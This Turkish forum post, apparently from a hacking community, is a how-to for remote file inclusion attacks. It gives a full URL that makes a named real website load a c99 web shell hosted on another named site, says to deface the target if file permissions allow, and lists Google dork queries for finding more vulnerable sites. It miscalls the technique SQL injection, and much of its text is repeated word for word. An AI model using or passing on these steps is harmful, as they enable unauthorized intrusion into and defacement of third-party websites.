Arkadaş bazı php sitelerinde SQL enjeksiyonu ile html kodlarının çalıştırabildiğini göstermişti bana. benim de hemen aklıma bu açığı zehirin php versiyonu ile birleştirmek geldi.nasıl mı şöyle. örnek olarak aşağıdaki siteyi aldım. http://www.lkh.sk/index.php?page=
page= burdan sonra zehir.phpyi attığımız hostun adınız yazıyoruz. hosta txt şeklinde atmanız daha iyidir neyse. ben http://www.scottishmusicnetwork.co.uk/c99.txt buraya attım zehiri. adres çubuğuna şunu yazıyoruz.
http://www.lkh.sk/index.php?page=http://www.scottishmusicnetwork.co.uk/c99.txt
ve karşınıza ne çıkıyor. sanki siteye zehiri upload etmiş gibi sitenin dosyaları çıkıyor. eğer permissionlar açıksa siteye index atıyorsunuz.
ha bu arada bu tür siteleri bulmak için googlede şu şekilde arama yaptırcaksınız.
"inurl:index.php?page=news.php"
"inurl:index.php?page=info.php"
Anlamadığınız yerleri bu konu altında sorabilirsiniz.
page= burdan sonra zehir.phpyi attığımız hostun adınız yazıyoruz. hosta txt şeklinde atmanız daha iyidir neyse. ben http://www.scottishmusicnetwork.co.uk/c99.txt buraya attım zehiri. adres çubuğuna şunu yazıyoruz.
http://www.lkh.sk/index.php?page=http://www.scottishmusicnetwork.co.uk/c99.txt
ve karşınıza ne çıkıyor. sanki siteye zehiri upload etmiş gibi sitenin dosyaları çıkıyor. eğer permissionlar açıksa siteye index atıyorsunuz.
ha bu arada bu tür siteleri bulmak için googlede şu şekilde arama yaptırcaksınız.
"inurl:index.php?page=news.php"
"inurl:index.php?page=info.php"
Anlamadığınız yerleri bu konu altında sorabilirsiniz.
